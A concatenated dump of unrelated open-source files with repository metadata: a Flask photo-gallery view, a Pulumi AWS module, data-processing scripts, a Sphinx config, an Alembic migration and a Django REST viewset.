66af5b756de02b6cc4aedfe8e1b619517e232a20 | 1,382 | py | Python | app/views/main/photos.py | Wern-rm/raton.by | 68f862f2bc0551bf2327e9d6352c0cde93f45301 | [
"MIT"
] | null | null | null | app/views/main/photos.py | Wern-rm/raton.by | 68f862f2bc0551bf2327e9d6352c0cde93f45301 | [
"MIT"
] | null | null | null | app/views/main/photos.py | Wern-rm/raton.by | 68f862f2bc0551bf2327e9d6352c0cde93f45301 | [
"MIT"
] | null | null | null | from flask import render_template, redirect, url_for, request
from app import db, logger
from app.controllers.app_controller import app_controller
from app.controllers.qustion_phone import question_phone
from app.models.photo_catalogs import PhotoCatalogs
from app.models.photos import Photos
from app.views.main import bp
@bp.route('/photos', methods=['GET', 'POST'])
@app_controller
@question_phone
def photos(**kwargs):
    """Render the photo gallery, optionally filtered by ?catalog_id=N.

    Invalid, unknown or hidden (status == 0) catalog ids redirect back to
    the unfiltered gallery.

    Fixes: `catalog` was previously unbound on the default (no catalog_id)
    path, raising UnboundLocalError; and `catalog.status` raised
    AttributeError for an unknown id.
    """
    catalog_id = 0
    is_photos = False
    catalog = None  # stays None on the unfiltered gallery page
    try:
        raw_id = request.args.get('catalog_id')
        if raw_id is not None and raw_id != '':
            catalog_id = int(raw_id)
            is_photos = True
    except Exception as e:
        # Non-numeric catalog_id: log and fall back to the plain gallery.
        logger.error(e)
        return redirect(url_for('main.photos'))
    if catalog_id > 0:
        catalog = db.session.query(PhotoCatalogs).filter(PhotoCatalogs.id == catalog_id).first()
        # Unknown id or hidden catalog: do not expose it.
        if catalog is None or catalog.status == 0:
            return redirect(url_for('main.photos'))
    kwargs['is_photos'] = is_photos
    kwargs['photos'] = db.session.query(Photos).filter(Photos.catalog_id == catalog_id, Photos.status == 1).all()
    kwargs['catalog'] = catalog
    kwargs['title'] = 'Фотогалерея'
    kwargs['catalogs'] = db.session.query(PhotoCatalogs).filter(PhotoCatalogs.status == 1).order_by(PhotoCatalogs.name).all()
    return render_template("default/photos.html", **kwargs)
31da8b4b2f25113381afa6f49ef642d7e91d48c8 | 7,163 | py | Python | sdk/python/pulumi_aws/ec2/get_instance_type_offerings.py | chivandikwa/pulumi-aws | 19c08bf9dcb90544450ffa4eec7bf6751058fde2 | [
"ECL-2.0",
"Apache-2.0"
] | 260 | 2018-06-18T14:57:00.000Z | 2022-03-29T11:41:03.000Z | sdk/python/pulumi_aws/ec2/get_instance_type_offerings.py | chivandikwa/pulumi-aws | 19c08bf9dcb90544450ffa4eec7bf6751058fde2 | [
"ECL-2.0",
"Apache-2.0"
] | 1,154 | 2018-06-19T20:38:20.000Z | 2022-03-31T19:48:16.000Z | sdk/python/pulumi_aws/ec2/get_instance_type_offerings.py | chivandikwa/pulumi-aws | 19c08bf9dcb90544450ffa4eec7bf6751058fde2 | [
"ECL-2.0",
"Apache-2.0"
] | 115 | 2018-06-28T03:20:27.000Z | 2022-03-29T11:41:06.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = [
'GetInstanceTypeOfferingsResult',
'AwaitableGetInstanceTypeOfferingsResult',
'get_instance_type_offerings',
'get_instance_type_offerings_output',
]
@pulumi.output_type
class GetInstanceTypeOfferingsResult:
"""
A collection of values returned by getInstanceTypeOfferings.
"""
def __init__(__self__, filters=None, id=None, instance_types=None, location_type=None, location_types=None, locations=None):
if filters and not isinstance(filters, list):
raise TypeError("Expected argument 'filters' to be a list")
pulumi.set(__self__, "filters", filters)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if instance_types and not isinstance(instance_types, list):
raise TypeError("Expected argument 'instance_types' to be a list")
pulumi.set(__self__, "instance_types", instance_types)
if location_type and not isinstance(location_type, str):
raise TypeError("Expected argument 'location_type' to be a str")
pulumi.set(__self__, "location_type", location_type)
if location_types and not isinstance(location_types, list):
raise TypeError("Expected argument 'location_types' to be a list")
pulumi.set(__self__, "location_types", location_types)
if locations and not isinstance(locations, list):
raise TypeError("Expected argument 'locations' to be a list")
pulumi.set(__self__, "locations", locations)
@property
@pulumi.getter
def filters(self) -> Optional[Sequence['outputs.GetInstanceTypeOfferingsFilterResult']]:
return pulumi.get(self, "filters")
@property
@pulumi.getter
def id(self) -> str:
"""
The provider-assigned unique ID for this managed resource.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter(name="instanceTypes")
def instance_types(self) -> Sequence[str]:
"""
List of EC2 Instance Types.
"""
return pulumi.get(self, "instance_types")
@property
@pulumi.getter(name="locationType")
def location_type(self) -> Optional[str]:
return pulumi.get(self, "location_type")
@property
@pulumi.getter(name="locationTypes")
def location_types(self) -> Sequence[str]:
"""
List of location types.
"""
return pulumi.get(self, "location_types")
@property
@pulumi.getter
def locations(self) -> Sequence[str]:
"""
List of locations.
"""
return pulumi.get(self, "locations")
class AwaitableGetInstanceTypeOfferingsResult(GetInstanceTypeOfferingsResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetInstanceTypeOfferingsResult(
filters=self.filters,
id=self.id,
instance_types=self.instance_types,
location_type=self.location_type,
location_types=self.location_types,
locations=self.locations)
def get_instance_type_offerings(filters: Optional[Sequence[pulumi.InputType['GetInstanceTypeOfferingsFilterArgs']]] = None,
location_type: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetInstanceTypeOfferingsResult:
"""
Information about EC2 Instance Type Offerings.
## Example Usage
```python
import pulumi
import pulumi_aws as aws
example = aws.ec2.get_instance_type_offerings(filters=[
aws.ec2.GetInstanceTypeOfferingsFilterArgs(
name="instance-type",
values=[
"t2.micro",
"t3.micro",
],
),
aws.ec2.GetInstanceTypeOfferingsFilterArgs(
name="location",
values=["usw2-az4"],
),
],
location_type="availability-zone-id")
```
:param Sequence[pulumi.InputType['GetInstanceTypeOfferingsFilterArgs']] filters: One or more configuration blocks containing name-values filters. See the [EC2 API Reference](https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstanceTypeOfferings.html) for supported filters. Detailed below.
:param str location_type: Location type. Defaults to `region`. Valid values: `availability-zone`, `availability-zone-id`, and `region`.
"""
__args__ = dict()
__args__['filters'] = filters
__args__['locationType'] = location_type
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('aws:ec2/getInstanceTypeOfferings:getInstanceTypeOfferings', __args__, opts=opts, typ=GetInstanceTypeOfferingsResult).value
return AwaitableGetInstanceTypeOfferingsResult(
filters=__ret__.filters,
id=__ret__.id,
instance_types=__ret__.instance_types,
location_type=__ret__.location_type,
location_types=__ret__.location_types,
locations=__ret__.locations)
@_utilities.lift_output_func(get_instance_type_offerings)
def get_instance_type_offerings_output(filters: Optional[pulumi.Input[Optional[Sequence[pulumi.InputType['GetInstanceTypeOfferingsFilterArgs']]]]] = None,
                                       location_type: Optional[pulumi.Input[Optional[str]]] = None,
                                       opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetInstanceTypeOfferingsResult]:
    """
    Information about EC2 Instance Type Offerings.
    ## Example Usage
    ```python
    import pulumi
    import pulumi_aws as aws
    example = aws.ec2.get_instance_type_offerings(filters=[
            aws.ec2.GetInstanceTypeOfferingsFilterArgs(
                name="instance-type",
                values=[
                    "t2.micro",
                    "t3.micro",
                ],
            ),
            aws.ec2.GetInstanceTypeOfferingsFilterArgs(
                name="location",
                values=["usw2-az4"],
            ),
        ],
        location_type="availability-zone-id")
    ```
    :param Sequence[pulumi.InputType['GetInstanceTypeOfferingsFilterArgs']] filters: One or more configuration blocks containing name-values filters. See the [EC2 API Reference](https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstanceTypeOfferings.html) for supported filters. Detailed below.
    :param str location_type: Location type. Defaults to `region`. Valid values: `availability-zone`, `availability-zone-id`, and `region`.
    """
    # The empty body is intentional: the lift_output_func decorator supplies
    # the implementation by wrapping get_instance_type_offerings so that
    # pulumi.Input arguments are resolved and the result is a pulumi.Output.
    ...
| 38.510753 | 311 | 0.656987 |
a6c14cd18b926fdfe8c73fa4569e1b044322cb20 | 1,740 | py | Python | puf_stage2/stage2.py | chusloj/taxdata | 52c02c5f457145413983762280f8c1552b5ac740 | [
"CC0-1.0"
] | null | null | null | puf_stage2/stage2.py | chusloj/taxdata | 52c02c5f457145413983762280f8c1552b5ac740 | [
"CC0-1.0"
] | null | null | null | puf_stage2/stage2.py | chusloj/taxdata | 52c02c5f457145413983762280f8c1552b5ac740 | [
"CC0-1.0"
] | null | null | null | import os
import glob
import numpy as np
import pandas as pd
from dataprep import dataprep
CUR_PATH = os.path.abspath(os.path.dirname(__file__))
# Read private CPS-matched-PUF file into a Pandas DataFrame
puf = pd.read_csv(os.path.join(CUR_PATH, "../puf_data/cps-matched-puf.csv"))
# Read stage1 factors and stage2 targets written by stage1.py script
factors = pd.read_csv(
os.path.join(CUR_PATH, "../puf_stage1/Stage_I_factors.csv"), index_col=0
)
Stage_I_factors = factors.transpose()
stage2_path = os.path.join(CUR_PATH, "../puf_stage1/Stage_II_targets.csv")
Stage_II_targets = pd.read_csv(stage2_path, index_col=0)
# Use the matched_weight variable in CPS as the final weight
puf.s006 = puf.matched_weight * 100
# Dataprep
year_list = [x for x in range(2012, 2030 + 1)]
for i in year_list:
dataprep(puf, Stage_I_factors, Stage_II_targets, year=i)
# Solver (in Julia)
env_path = os.path.join(CUR_PATH, "../Project.toml")
os.system(f"julia --project={env_path} solver.jl")
# Initialize weights dataframe
z = pd.DataFrame()
z["WT2011"] = puf.s006
# write solution to dataframe
for i in year_list:
s006 = np.where(
puf.e02400 > 0,
puf.s006 * Stage_I_factors[i]["APOPSNR"] / 100,
puf.s006 * Stage_I_factors[i]["ARETS"] / 100,
)
array = np.load(str(str(i) + "_output.npz"))
r_val = array["r"]
s_val = array["s"]
z_val = (1.0 + r_val - s_val) * s006 * 100
z[str("WT" + str(i))] = z_val
# Write all weights (rounded to nearest integer) to puf_weights.csv file
z = z.round(0).astype("int64")
z.to_csv(os.path.join(CUR_PATH, "puf_weights.csv.gz"), index=False, compression="gzip")
# remove all .npz (numpy array) files
for file in glob.glob("*.npz"):
os.remove(file)
| 28.52459 | 87 | 0.698276 |
3334f3f75a0f0ab9893baba1b11f8d5b5197c5c2 | 871 | py | Python | scripts/takethecleanest.py | multimedia-eurecat/ELFW | 98a6eca7ab9152a7cf8c447ee9f4a62b5629e3b2 | [
"Apache-2.0"
] | 15 | 2020-07-10T08:19:13.000Z | 2022-02-24T08:52:24.000Z | scripts/takethecleanest.py | multimedia-eurecat/ELFW | 98a6eca7ab9152a7cf8c447ee9f4a62b5629e3b2 | [
"Apache-2.0"
] | 7 | 2020-08-11T06:26:54.000Z | 2021-04-23T08:32:21.000Z | scripts/takethecleanest.py | multimedia-eurecat/ELFW | 98a6eca7ab9152a7cf8c447ee9f4a62b5629e3b2 | [
"Apache-2.0"
] | 5 | 2020-08-11T09:09:42.000Z | 2020-11-25T12:02:54.000Z | # This script takes all non-ground-truth-labeled images in LFW and copies them apart.
# Rafael Redondo - 2019
import os
import sys
import shutil
if len(sys.argv) != 3:
print "Usage: $ takethecleanest <filelist> <output folder>"
exit(0)
filelist = sys.argv[1]
f = open(filelist,"r")
labels = []
for line in f:
labels.append(line)
output_folder = sys.argv[2]
if not os.path.exists(output_folder):
os.mkdir(output_folder)
faces_folder = '../Datasets/lfw-deepfunneled-bagoffaces/all/'
labels_folder = '../Datasets/lfw-original_from_parts/'
#print labels
for file in os.listdir(labels_folder):
if not file.endswith(".jpg"):
continue
if not any(file in s for s in labels):
src_file = faces_folder + '/' + file
dst_file = output_folder + '/' + file
shutil.copyfile(src_file, dst_file)
print "Copied to " + output_folder + " the file " + src_file
| 21.775 | 85 | 0.709529 |
991f6bacf00735c1c25215d3b1a5d3b69ceade09 | 7,765 | py | Python | process-datasets.py | CERNatschool/beta-attenuation | 86ff4091b5be287eb91b7345399288737bd2e051 | [
"MIT"
] | null | null | null | process-datasets.py | CERNatschool/beta-attenuation | 86ff4091b5be287eb91b7345399288737bd2e051 | [
"MIT"
] | null | null | null | process-datasets.py | CERNatschool/beta-attenuation | 86ff4091b5be287eb91b7345399288737bd2e051 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
CERN@school - Processing Datasets
See the README.md file for more information.
"""
# Import the code needed to manage files.
import os, glob
#...for parsing the arguments.
import argparse
#...for the logging.
import logging as lg
#...for file manipulation.
from shutil import rmtree
# Import the JSON library.
import json
#...for processing the datasets.
from cernatschool.dataset import Dataset
#...for making the frame and clusters images.
from visualisation.visualisation import makeFrameImage, makeKlusterImage
#...for getting the cluster properties JSON.
from cernatschool.helpers import getKlusterPropertiesJson
from data.datapoint import DataPoint
if __name__ == "__main__":

    # CERN@school dataset processing: for each data-point sub-directory of
    # the input path, render frame and cluster images and write frames.json
    # / klusters.json summaries into a matching output sub-directory.

    print("*")
    print("*========================================*")
    print("* CERN@school - local dataset processing *")
    print("*========================================*")

    # Get the datafile path from the command line.
    parser = argparse.ArgumentParser()
    parser.add_argument("inputPath", help="Path to the input datasets.")
    parser.add_argument("outputPath", help="The base path for the output.")
    parser.add_argument("-v", "--verbose", help="Increase output verbosity", action="store_true")
    parser.add_argument("-g", "--gamma", help="Process gamma candidates too", action="store_true")
    args = parser.parse_args()

    ## The path to the data file.
    datapath = args.inputPath

    ## The output path.
    outputpath = args.outputPath

    # Check if the output directory exists. If it doesn't, quit.
    if not os.path.isdir(outputpath):
        raise IOError("* ERROR: '%s' output directory does not exist!" % (outputpath))

    # Set the logging level.
    if args.verbose:
        level = lg.DEBUG
    else:
        level = lg.INFO

    # Configure the logging.
    lg.basicConfig(filename=outputpath + '/log_process-datasets.log', filemode='w', level=level)

    print("*")
    print("* Input path : '%s'" % (datapath))
    print("* Output path : '%s'" % (outputpath))
    print("*")
    if args.gamma:
        print("* Gamma candidate clusters WILL be processed.")
    else:
        print("* Gamma candidate clusters WILL NOT be processed.")
    print("*")

    # Find the data sub-directories: each one becomes a DataPoint.
    data_points = []
    for entry in sorted(glob.glob((datapath + "/*").replace("//", "/"))):
        if os.path.isdir(entry):
            data_points.append(DataPoint(entry, outputpath))
    data_points = sorted(data_points)

    # Process each data point in turn.
    for dp in data_points:

        print("* Processing '%s'." % (dp.get_name()))

        # An existing output directory marks a previously processed data
        # point, so skip it rather than recompute.
        if os.path.isdir(dp.get_output_path()):
            lg.info(" * Skipping directory '%s'..." % (dp.get_output_path()))
            print(" * Skipping directory '%s'..." % (dp.get_output_path()))
            continue

        os.mkdir(dp.get_output_path())
        lg.info(" * Creating directory '%s'..." % (dp.get_output_path()))
        lg.info("")

        ## The path to the frame images.
        frpath = (dp.get_output_path() + "/frames/").replace("//", "/")

        if os.path.isdir(frpath):
            rmtree(frpath)
            lg.info(" * Removing directory '%s'..." % (frpath))
        os.mkdir(frpath)
        lg.info(" * Creating directory '%s'..." % (frpath))
        lg.info("")

        ## The path to the cluster images.
        klpath = (dp.get_output_path() + "/clusters/").replace("//", "/")

        if os.path.isdir(klpath):
            rmtree(klpath)
            lg.info(" * Removing directory '%s'..." % (klpath))
        os.mkdir(klpath)
        lg.info(" * Creating directory '%s'..." % (klpath))
        lg.info("")

        ## The dataset to process.
        ds = Dataset(dp.get_input_path() + "/ASCIIxyC/")

        # Get the metadata from the JSON.
        # FIX: the previous call was json.load(fmdf, fmd), which passed None
        # into json.load's second parameter — the (deprecated) 'encoding' on
        # Python 2 and a TypeError on Python 3, where the extra parameters
        # are keyword-only. json.load takes only the file object here.
        with open(dp.get_input_path() + "/metadata.json", "r") as fmdf:
            fmd = json.load(fmdf)

        ## Latitude of the dataset [deg.].
        lat = fmd[0]['lat'] # [deg.]

        ## Longitude of the dataset [deg.].
        lon = fmd[0]['lon'] # [deg.]

        ## Altitude of the dataset [m].
        alt = fmd[0]['alt'] # [m]

        ## The pixel mask: maps X = 256*y + x of each masked pixel to 1.
        pixel_mask = {}
        with open(dp.get_input_path() + "/masked_pixels.txt", "r") as mpf:
            rows = mpf.readlines()
            for row in rows:
                vals = [int(val) for val in row.strip().split("\t")]
                x = vals[0]; y = vals[1]; X = (256*y) + x; C = 1
                pixel_mask[X] = C

        ## The frames from the dataset.
        frames = ds.getFrames((lat, lon, alt), pixelmask = pixel_mask)

        lg.info(" * Found %d datafiles." % (len(frames)))

        ## A list of frame metadata dictionaries.
        mds = []

        ## A list of cluster property dictionaries.
        klusters = []

        # Loop over the frames.
        for i, f in enumerate(frames):

            if i % 50 == 0:
                print("*--> '%s': processing frame % 10d..." % (dp.get_name(), i))

            ## The basename for the data frame, based on frame information.
            bn = "%s_%d-%06d" % (f.getChipId(), f.getStartTimeSec(), f.getStartTimeSubSec())

            # Create the frame image.
            makeFrameImage(bn, f.getPixelMap(), frpath)

            # Create the metadata dictionary for the frame.
            metadata = {
                "id": bn,
                #
                "chipid": f.getChipId(),
                "hv": f.getBiasVoltage(),
                "ikrum": f.getIKrum(),
                #
                "lat": f.getLatitude(),
                "lon": f.getLongitude(),
                "alt": f.getAltitude(),
                #
                "start_time": f.getStartTimeSec(),
                "end_time": f.getEndTimeSec(),
                "acqtime": f.getAcqTime(),
                #
                "n_pixel": f.getNumberOfUnmaskedPixels(),
                "occ": f.getOccupancy(),
                "occ_pc": f.getOccupancyPc(),
                #
                "n_kluster": f.getNumberOfKlusters(),
                "n_gamma": f.getNumberOfGammas(),
                "n_non_gamma": f.getNumberOfNonGammas(),
                #
                "ismc": int(f.isMC())
            }

            # Add the frame metadata to the list of frames.
            mds.append(metadata)

            # The cluster analysis
            #----------------------

            # Loop over the clusters.  The loop variable is named ki so it
            # no longer shadows the frame index i of the enclosing loop.
            for ki, kl in enumerate(f.getKlusterFinder().getListOfKlusters()):

                # Skip gamma candidates unless the user asked for them.
                if not args.gamma and kl.isGamma():
                    continue

                ## The kluster ID.
                klusterid = bn + "_k%05d" % (ki)

                # Get the cluster properties JSON entry and add it to the list.
                klusters.append(getKlusterPropertiesJson(klusterid, kl))

                # Make the cluster image.
                makeKlusterImage(klusterid, kl, klpath)

        # Write out the frame information to a JSON file.
        with open((dp.get_output_path() + "/frames.json").replace("//", "/"), "w") as jf:
            json.dump(mds, jf)

        # Write out the cluster information to a JSON file.
        with open((dp.get_output_path() + "/klusters.json").replace("//", "/"), "w") as jf:
            json.dump(klusters, jf)

        lg.info(" *")
| 32.086777 | 100 | 0.524404 |
c0cf78c1b797ae3949a6a96b74267aace1a3fbc3 | 5,911 | py | Python | docs/source/conf.py | sanis/zip | 2206cfd9c0024f7d21ce65250e96cc6d89e19655 | [
"MIT"
] | null | null | null | docs/source/conf.py | sanis/zip | 2206cfd9c0024f7d21ce65250e96cc6d89e19655 | [
"MIT"
] | null | null | null | docs/source/conf.py | sanis/zip | 2206cfd9c0024f7d21ce65250e96cc6d89e19655 | [
"MIT"
] | null | null | null | import sys
import os

# Sphinx build configuration for the Elibyy/Zip documentation.
# Make this directory and the bundled sphinxPHP extensions importable.
current_dir = os.path.dirname(os.path.abspath(__file__))
sys.path.append(current_dir)
sys.path.append(current_dir + '/sphinxPHP')

import sensio

extensions = ['sensio.sphinx.refinclude', 'sensio.sphinx.configurationblock', 'sensio.sphinx.phpcode']
# NOTE(review): the assignment below immediately overwrites the sensio
# extension list above, leaving all extensions disabled (and making the
# 'import sensio' above unused) — confirm whether this is intentional.
extensions = []

templates_path = ['_templates']
source_suffix = '.rst'
#source_encoding = 'utf-8-sig'
master_doc = 'index'
project = u'Elibyy/Zip'
copyright = u'2014, elibyy'
version = '1.0'
release = '1.0'
exclude_patterns = []
pygments_style = 'sphinx'
html_theme = 'Elibyy'
html_theme_path = ['_themes']
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static','API']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'ElibyyZipdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
    ('index', 'ElibyyZip.tex', u'Elibyy/Zip Documentation',
     u'elibyy', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
    ('index', 'elibyyzip', u'Elibyy/Zip Documentation',
     [u'elibyy'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
    ('index', 'ElibyyZip', u'Elibyy/Zip Documentation',
     u'elibyy', 'ElibyyZip', 'One line description of project.',
     'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
| 29.853535 | 102 | 0.711386 |
035aef627324e7db41588c5929fd90a6a244463d | 2,397 | py | Python | psi/migrations/versions/40_e1f806a716b9_.py | lusi1990/betterlifepsi | 8e7f8562967ab1816d8c25db3251c550a357f39c | [
"MIT"
] | 33 | 2018-10-19T03:41:56.000Z | 2022-01-23T16:26:02.000Z | psi/migrations/versions/40_e1f806a716b9_.py | lusi1990/betterlifepsi | 8e7f8562967ab1816d8c25db3251c550a357f39c | [
"MIT"
] | 318 | 2018-09-23T15:16:54.000Z | 2022-03-31T22:58:55.000Z | psi/migrations/versions/40_e1f806a716b9_.py | lusi1990/betterlifepsi | 8e7f8562967ab1816d8c25db3251c550a357f39c | [
"MIT"
] | 19 | 2018-10-22T18:04:18.000Z | 2021-12-06T19:49:05.000Z | """ Add create date field to supplier model, make role.is_system and shipping.type_id not null.
Revision ID: e1f806a716b9
Revises: 052340beb7b5
Create Date: 2017-05-25 08:12:35.839903
"""
# revision identifiers, used by Alembic.
revision = 'e1f806a716b9'
down_revision = '052340beb7b5'
from alembic import op
import sqlalchemy as sa
from sqlalchemy import func
from sqlalchemy.sql import text
from datetime import datetime
def upgrade():
    """Apply the migration.

    Makes role.is_system and shipping.type_id NOT NULL, then adds a
    supplier.create_date column back-filled from the earliest sales order
    (via product linkage), falling back to the earliest purchase order,
    and finally to now() for suppliers with neither, before making the
    column NOT NULL.
    """
    # ### commands auto generated by Alembic - please adjust! ###
    op.alter_column('role', 'is_system', existing_type=sa.BOOLEAN(),
                    nullable=False, existing_server_default=sa.text(u'true'))
    op.alter_column('shipping', 'type_id', existing_type=sa.INTEGER(), nullable=False)
    op.add_column('supplier', sa.Column('create_date', sa.DateTime(), nullable=True))
    # Earliest sales-order date per supplier, reached through the products
    # sold on each order.
    results = op.get_bind().execute(text("""
        select sup.id, min(so.order_date) from sales_order so, supplier sup,
        sales_order_line sol, product p where so.id = sol.sales_order_id and
        sol.product_id = p.id and p.supplier_id = sup.id group by sup.id;
    """)).fetchall()
    for r in results:
        sup_id = r[0]
        so_date = r[1]
        # NOTE(review): values are interpolated into the SQL string rather
        # than bound as parameters; both come from the database itself so
        # injection risk is low, but bind parameters would be safer.
        op.get_bind().execute(text("update supplier set create_date = '{0}' where id={1}".format(so_date, sup_id)))
    # Earliest purchase-order date per supplier, used only where the
    # sales-order pass left create_date NULL.
    results = op.get_bind().execute(text("""
        select sup.id, min(po.order_date) from purchase_order po, supplier sup
        where po.supplier_id = sup.id group by sup.id
    """)).fetchall()
    for r in results:
        sup_id = r[0]
        po_date = r[1]
        op.get_bind().execute(text("update supplier set create_date = '{0}' where id={1} and create_date is null".format(po_date, sup_id)))
    # Any supplier with no orders at all gets the migration time.
    op.get_bind().execute(text("update supplier set create_date = '{0}' where create_date is null".format(datetime.now())))
    op.alter_column('supplier', 'create_date', existing_type=sa.DateTime(), nullable=False)
    # ### end Alembic commands ###
def downgrade():
    """Revert the migration: drop supplier.create_date and restore the
    nullable state of shipping.type_id and role.is_system."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.drop_column('supplier', 'create_date')
    op.alter_column('shipping', 'type_id',
                    existing_type=sa.INTEGER(),
                    nullable=True)
    op.alter_column('role', 'is_system',
                    existing_type=sa.BOOLEAN(),
                    nullable=True,
                    existing_server_default=sa.text(u'true'))
    # ### end Alembic commands ###
| 38.047619 | 139 | 0.670004 |
74c98c4baa4440b934486336f5e4b9ebbc1e7eaa | 483 | py | Python | tag/views.py | farhad0085/django-money-management | d4622192d6b9df3f785abd5f4ef1bfcbf465d045 | [
"MIT"
] | null | null | null | tag/views.py | farhad0085/django-money-management | d4622192d6b9df3f785abd5f4ef1bfcbf465d045 | [
"MIT"
] | null | null | null | tag/views.py | farhad0085/django-money-management | d4622192d6b9df3f785abd5f4ef1bfcbf465d045 | [
"MIT"
] | null | null | null | from .serializers import TagSerializer
from .models import Tag
from rest_framework.viewsets import ModelViewSet
class TagViewSet(ModelViewSet):
    """CRUD endpoints for Tag objects, accepting single items or bulk lists."""

    queryset = Tag.objects.all()
    serializer_class = TagSerializer

    def get_serializer(self, *args, **kwargs):
        """Enable many=True automatically when a JSON array is posted."""
        payload = kwargs.get('data', {})
        if isinstance(payload, list):
            kwargs['many'] = True
        return super(TagViewSet, self).get_serializer(*args, **kwargs)
a83427cd529ee911c97e0c2908a48199e212ee3f | 150 | py | Python | anuvaad-etl/anuvaad-extractor/document-processor/word-detector/craft/src/routes/__init__.py | srihari-nagaraj/anuvaad | b09b01a033a033e97db6e404c088e0e6332053e4 | [
"MIT"
] | null | null | null | anuvaad-etl/anuvaad-extractor/document-processor/word-detector/craft/src/routes/__init__.py | srihari-nagaraj/anuvaad | b09b01a033a033e97db6e404c088e0e6332053e4 | [
"MIT"
] | null | null | null | anuvaad-etl/anuvaad-extractor/document-processor/word-detector/craft/src/routes/__init__.py | srihari-nagaraj/anuvaad | b09b01a033a033e97db6e404c088e0e6332053e4 | [
"MIT"
] | null | null | null | from .routes import Word_Detector_BLUEPRINT
from .routes import Word_Detector_BLUEPRINT_WF
#from .documentstructure import DOCUMENTSTRUCTURE_BLUEPRINT | 50 | 59 | 0.9 |
3d4bdbf9b603b630dbcc0d42709b2de06aeef154 | 86,612 | py | Python | networking_p4/agent/agent_drivers/bmv2/adaptor/bmv2/runtime_api.py | osinstom/networking-p4 | 3b82025090b6b2bf1e9faa58492d13ed1da6c34f | [
"Apache-2.0"
] | 2 | 2019-12-26T08:53:25.000Z | 2020-05-13T11:53:51.000Z | networking_p4/agent/agent_drivers/bmv2/adaptor/bmv2/runtime_api.py | osinstom/networking-dppx | 3b82025090b6b2bf1e9faa58492d13ed1da6c34f | [
"Apache-2.0"
